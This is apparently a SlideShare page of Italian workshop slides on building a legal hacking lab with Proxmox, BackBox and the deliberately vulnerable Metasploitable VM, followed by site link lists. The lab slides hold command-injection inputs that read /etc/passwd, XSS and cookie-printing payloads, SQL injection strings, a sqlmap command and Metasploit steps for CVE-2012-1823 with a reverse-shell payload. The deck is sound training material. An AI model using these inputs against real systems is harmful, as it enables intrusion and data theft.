SlideShare a Scribd company logo
1 of 36
Download to read offline
Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
HACKING LAB
con ProxMox e Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
$ whoami
Phishing Analysis and Contrast @ D3Lab
Team Member @ BackBox Linux
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Hacking Lab
Un laboratorio nella propria infrastruttura di rete per allenarsi
in assoluta legalità sulle tecniche sfruttate nel Hacking.
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
ProxMox
Proxmox VE is a complete open source server virtualization
management software. It is based on KVM virtualization and
container-based virtualization and manages KVM virtual
machines, Linux containers (LXC), storage, virtualized
networks, and HA clusters
www.proxmox.com
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Metasploitable
Metasploitable is an intentionally vulnerable Linux virtual
machine. This VM can be used to conduct security training,
test security tools, and practice common penetration testing
techniques.
https://sourceforge.net/projects/metasploitable/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
BackBox is a penetration test and security assessment
oriented Ubuntu-based Linux distribution providing a network
and informatic systems analysis toolkit. BackBox desktop
environment includes a complete set of tools required for
ethical hacking and security testing.
BackBox Linux
backbox.org
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Creiamo una nuova Macchina Virtuale dal Pannello Web
Ricordatevelo
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
$ ssh root@IP_PROXMOX
# cd /var/lib/vz/images

# mkdir 102 (ID del VM che abbiamo prima creato)
# cd 102

# wget http://bit.ly/metasploitable -O metasploitable.zip

# unzip metasploitable.zip
# cd Metasploitable2-Linux/
# mv Metasploitable.vmdk ../
# rm metasploitable.zip ./Metasploitable2-Linux/ -rf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
# qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2
…Metasploitable.qcow2
# nano /etc/pve/qemu-server/102.conf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
bootdisk: ide0
ide0: file=local:102/Metasploitable.qcow2,size=8G
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Avviamo la VM
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
https://youtu.be/WBsCOjRQKnI
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ nmap 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ sudo nmap -o 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
…
…
…
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Zenmap
$ sudo zenmap
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Dirsearch
$ dirsearch -e php -u http://192.168.x.x
[22:30:01] 200 - 112KB - /doc/
[22:30:01] 302 - 0B - /dvwa/ -> login.php
[22:30:03] 200 - 891B - /index.php
[22:30:05] 200 - 24KB - /mutillidae/
[22:30:05] 200 - 4KB - /phpMyAdmin/
[22:30:06] 200 - 48KB - /phpinfo.php
[22:30:07] 403 - 300B - /server-status/
[22:30:08] 200 - 884B - /test/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA
http://192.168.x.x/dvwa/ admin:password
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Low
192.168.2.1 ; cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Medium
192.168.2.1 & cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Low
<script>alert('Hello World')</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Medium
<ScRiPt>alert('Hello World’)</script>
<script language="javascript">alert('Hello World’)</script>
<img src=x onerror="alert('Hello World')">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Low
<script>document.write(document.cookie)</script>
<iframe src=“http://www.makerstation.it/"></iframe>
<meta http-equiv="refresh" content="10; url=http://
www.makerstation.it/">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Medium
<ScRiPt>alert("Hello World 2")</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low
' or '0'='0
' or '0'='0' union select null, version() #
' or '0'='0' union select null, database() #
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low and SQLMap
sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" --
forms --cookie="security=low; PHPSESSID=xyz"
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Medium
0 or 1=1
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Whatweb
$ whatweb 192.168.x.x
[200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8
(Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10],
Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-
By[PHP/5.2.4-2ubuntu5.10]
$ nmap -sV --script=http-php-version 192.168.x.x
|_Version from header x-powered-by: PHP/5.2.4-2
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Metasploit
$ sudo metasploit
# search CVE-2012-1823
# use exploit/multi/http/php_cgi_arg_injection
# show options
# set RHOST 192.168.x.x

# set PAYLOAD php/meterpreter/reverse_tcp
# exploit
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Armitage
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Q&A
@AndreaDraghetti

More Related Content

What's hot

Apache web server
Apache web serverApache web server
Apache web serverSabiha M
 
Detecting network virus using mikrotik
Detecting network virus using mikrotikDetecting network virus using mikrotik
Detecting network virus using mikrotikAchmad Mardiansyah
 
Layer 7 Firewall on Mikrotik
Layer 7 Firewall on MikrotikLayer 7 Firewall on Mikrotik
Layer 7 Firewall on MikrotikGLC Networks
 
Cisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookCisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookRHC Technologies
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wiresharkBasaveswar Kureti
 
DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKMarian Marinov
 
Wireshark network analysing software
Wireshark network analysing softwareWireshark network analysing software
Wireshark network analysing softwaredharmesh nakum
 
Wireshark Inroduction Li In
Wireshark Inroduction  Li InWireshark Inroduction  Li In
Wireshark Inroduction Li Inmhaviv
 
ACL on Linux - Part 1
ACL on Linux - Part 1ACL on Linux - Part 1
ACL on Linux - Part 1GLC Networks
 
Network LACP/Bonding/Teaming with Mikrotik
Network LACP/Bonding/Teaming with MikrotikNetwork LACP/Bonding/Teaming with Mikrotik
Network LACP/Bonding/Teaming with MikrotikGLC Networks
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with WiresharkJim Gilsinn
 

What's hot (20)

Port Security
Port SecurityPort Security
Port Security
 
wireshark
wiresharkwireshark
wireshark
 
Nikto
NiktoNikto
Nikto
 
Apache web server
Apache web serverApache web server
Apache web server
 
Detecting network virus using mikrotik
Detecting network virus using mikrotikDetecting network virus using mikrotik
Detecting network virus using mikrotik
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 
Layer 7 Firewall on Mikrotik
Layer 7 Firewall on MikrotikLayer 7 Firewall on Mikrotik
Layer 7 Firewall on Mikrotik
 
Cisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookCisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBook
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wireshark
 
Wireshark
WiresharkWireshark
Wireshark
 
DoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDKDoS and DDoS mitigations with eBPF, XDP and DPDK
DoS and DDoS mitigations with eBPF, XDP and DPDK
 
Linux: LVM
Linux: LVMLinux: LVM
Linux: LVM
 
Wireshark network analysing software
Wireshark network analysing softwareWireshark network analysing software
Wireshark network analysing software
 
Wireshark Inroduction Li In
Wireshark Inroduction  Li InWireshark Inroduction  Li In
Wireshark Inroduction Li In
 
ACL on Linux - Part 1
ACL on Linux - Part 1ACL on Linux - Part 1
ACL on Linux - Part 1
 
Apache ppt
Apache pptApache ppt
Apache ppt
 
Network LACP/Bonding/Teaming with Mikrotik
Network LACP/Bonding/Teaming with MikrotikNetwork LACP/Bonding/Teaming with Mikrotik
Network LACP/Bonding/Teaming with Mikrotik
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with Wireshark
 
BGP on mikrotik
BGP on mikrotikBGP on mikrotik
BGP on mikrotik
 
MTCNA
MTCNAMTCNA
MTCNA
 

Similar to Hacking Lab con ProxMox e Metasploitable

Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Atlassian
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...Saroj Sahu
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonJulia Mateo
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Zabbix
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNoSuchCon
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Igalia
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...Tokyo University of Science
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb ModuleAkramWaseem
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovZabbix
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Takuya Nishimoto
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiDocker, Inc.
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiMike Goelzer
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRubyPivorak MeetUp
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Ana Medina
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniquesprashant3535
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationRonald Bradford
 
Scalable Deployment Architectures with TYPO3 Surf, Git and Jenkins
Scalable Deployment Architectures with TYPO3 Surf, Git and JenkinsScalable Deployment Architectures with TYPO3 Surf, Git and Jenkins
Scalable Deployment Architectures with TYPO3 Surf, Git and Jenkinsmhelmich
 

Similar to Hacking Lab con ProxMox e Metasploitable (20)

Mininet Basics
Mininet BasicsMininet Basics
Mininet Basics
 
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and Marathon
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb Module
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRuby
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
 
DDEV - Extended
DDEV - ExtendedDDEV - Extended
DDEV - Extended
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to Implementation
 
Scalable Deployment Architectures with TYPO3 Surf, Git and Jenkins
Scalable Deployment Architectures with TYPO3 Surf, Git and JenkinsScalable Deployment Architectures with TYPO3 Surf, Git and Jenkins
Scalable Deployment Architectures with TYPO3 Surf, Git and Jenkins
 

More from Andrea Draghetti

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureAndrea Draghetti
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzioneAndrea Draghetti
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingAndrea Draghetti
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Andrea Draghetti
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsAndrea Draghetti
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneAndrea Draghetti
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariAndrea Draghetti
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoAndrea Draghetti
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many VictimsAndrea Draghetti
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisureAndrea Draghetti
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Andrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFAndrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...Andrea Draghetti
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockAndrea Draghetti
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!Andrea Draghetti
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!Andrea Draghetti
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiAndrea Draghetti
 

More from Andrea Draghetti (19)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTF
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
 

Recently uploaded

Flow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameFlow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameKapil Thakar
 
Automation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsAutomation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsDianaGray10
 
EMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarEMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarThousandEyes
 
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENT
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENTSIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENT
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENTxtailishbaloch
 
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc
 
Explore the UiPath Community and ways you can benefit on your journey to auto...
Explore the UiPath Community and ways you can benefit on your journey to auto...Explore the UiPath Community and ways you can benefit on your journey to auto...
Explore the UiPath Community and ways you can benefit on your journey to auto...DianaGray10
 
UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3DianaGray10
 
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdfQ4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdfTejal81
 
Patch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 updatePatch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 updateadam112203
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
 
3 Pitfalls Everyone Should Avoid with Cloud Data
